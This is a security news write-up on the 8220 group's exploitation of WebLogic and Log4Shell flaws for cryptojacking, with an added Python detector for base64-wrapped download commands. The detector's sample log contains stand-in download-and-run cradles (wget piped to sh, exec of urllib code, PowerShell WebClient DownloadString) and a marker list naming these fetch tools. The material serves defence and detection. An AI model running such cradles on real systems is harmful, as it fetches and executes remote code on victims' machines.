Attack

8220 Hacker Group exploiting WebLogic and Log4J issues to attack Web servers

Take action: Hackers love that you haven't patched vulnerabilities from 2017, 2020 and 2022. They will happily exploit them to attack you. It's up to you to decide whether to push for the patching effort or remain a hacking target indefinitely.


Learn More

The 8220 hacker group, identified in 2017 by Cisco Talos, targets Windows and Linux web servers using crypto-jacking malware, exploiting vulnerabilities like Oracle WebLogic's CVE-2017-3506 and Log4Shell's CVE-2021-44228. Crypto-jacking malware is a type of malicious software that secretly uses a victim's computing resources to mine cryptocurrency.

The hacker group has a history of exploiting a range of vulnerabilities in systems such as Confluence, Log4j, Drupal, Hadoop YARN, and Apache Struts2, using evolving tactics, techniques, and procedures.

In their recent activities, the 8220 gang has exploited vulnerabilities such as Oracle WebLogic (CVE-2017-3506) and Log4Shell (CVE-2021-44228), using methods that are simple yet effective. They have also utilized the CVE-2020-14883 vulnerability in Oracle WebLogic Server, often combined with CVE-2020-14882, an authentication bypass issue. These vulnerabilities are well-known and their exploitation tactics are publicly documented, allowing the group to easily adapt these for malware distribution.

The 8220 gang employs different methods based on the target's operating system. For Linux, they use various download techniques including cURL, wget, and Python urllib, all encoded in base64. For Windows, they execute downloaded PowerShell scripts using simple PowerShell WebClient commands. Additionally, they use a method to execute Java code directly, bypassing the need for an externally hosted XML file.
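The download techniques described above share one detectable trait: the command that fetches the payload is wrapped in base64. The following Python script is an added example for defenders, not code from the page or from the group's tooling. It decodes every long base64 run found in a process command-line log, tries both UTF-8 and UTF-16LE (the encoding PowerShell's -EncodedCommand expects), and flags lines whose plaintext mentions cURL, wget, Python urllib or the PowerShell WebClient class. The host names, paths, log format and example.invalid URLs in the sample log are constructed for the demonstration.

```python
"""Flag base64-wrapped download commands in process command-line logs.

Added example (not the page's or the 8220 group's code): decode each long
base64 run in a log line and check the plaintext for the download utilities
the write-up names (cURL, wget, Python urllib, PowerShell WebClient).
"""
import base64
import binascii
import re
from typing import List, Optional

# Substrings that indicate a download cradle once the base64 wrapper is removed.
# DownloadString/DownloadFile are the methods a WebClient-based cradle calls.
DOWNLOAD_MARKERS = ("curl ", "wget ", "urllib", "webclient", "downloadstring", "downloadfile")

# A run of base64 alphabet long enough to hold a command (24 chars = 18 bytes).
B64_RUN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def _looks_like_text(s: str) -> bool:
    """True when every character is printable or ordinary whitespace."""
    return bool(s) and all(c.isprintable() or c in "\r\n\t" for c in s)


def decode_base64_run(token: str) -> Optional[str]:
    """Decode one base64 token as UTF-8 or UTF-16LE (PowerShell -EncodedCommand).

    Returns None when the token is not valid base64 or does not decode to text.
    """
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None
    for enc in ("utf-8", "utf-16-le"):
        try:
            text = raw.decode(enc)
        except UnicodeDecodeError:
            continue
        # UTF-16LE payloads decode "successfully" as UTF-8 but contain NULs,
        # which fail the printable check and fall through to the next encoding.
        if _looks_like_text(text):
            return text
    return None


def flag_download_cradles(log_lines: List[str]) -> List[dict]:
    """Return one hit per log line whose decoded base64 contains a download marker."""
    hits = []
    for idx, line in enumerate(log_lines):
        for match in B64_RUN.finditer(line):
            decoded = decode_base64_run(match.group(0))
            if decoded is None:
                continue
            lowered = decoded.lower()
            marker = next((m for m in DOWNLOAD_MARKERS if m in lowered), None)
            if marker is not None:
                hits.append({"line": idx, "marker": marker, "decoded": decoded})
                break  # one hit per line is enough for triage
    return hits


def _b64(text: str, encoding: str = "utf-8") -> str:
    """Helper used only to build the constructed sample log below."""
    return base64.b64encode(text.encode(encoding)).decode("ascii")


# Constructed sample commands; the hosts, paths and example.invalid URLs are made up.
_WGET = "wget -q http://example.invalid/x.sh -O /tmp/x.sh"
_URLLIB = "import urllib.request\nurllib.request.urlopen('http://example.invalid/x')"
_WEBCLIENT = "(New-Object Net.WebClient).DownloadString('http://example.invalid/x.ps1')"
_BENIGN = "hello from a harmless base64 string"

SAMPLE_LOG = [
    "host1 bash -c 'echo " + _b64(_WGET) + " | base64 -d | sh'",
    "host2 python3 -c \"import base64;exec(base64.b64decode('" + _b64(_URLLIB) + "'))\"",
    "host3 powershell -EncodedCommand " + _b64(_WEBCLIENT, "utf-16-le"),
    "host4 /usr/bin/python3 /opt/app/report.py --period daily",
    "host5 bash -c 'echo " + _b64(_BENIGN) + " | base64 -d'",
]

if __name__ == "__main__":
    for hit in flag_download_cradles(SAMPLE_LOG):
        print(f"line {hit['line']}: marker={hit['marker']!r} decoded={hit['decoded']!r}")
```

Only the three lines that hide a download command are reported; the plain cron-style job and the benign base64 string are left alone. In production the same decode-then-match step fits naturally into an EDR or SIEM rule on process creation events, and the marker list can be extended with whatever fetch utilities are normal for your estate.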

The 8220 gang tends to reuse the same IPs, web servers, payloads, and attack tools, making their activities relatively easy to trace. Their recent activity spans across various sectors, including healthcare, telecommunications, and financial services in multiple countries, showing their opportunistic approach to target selection.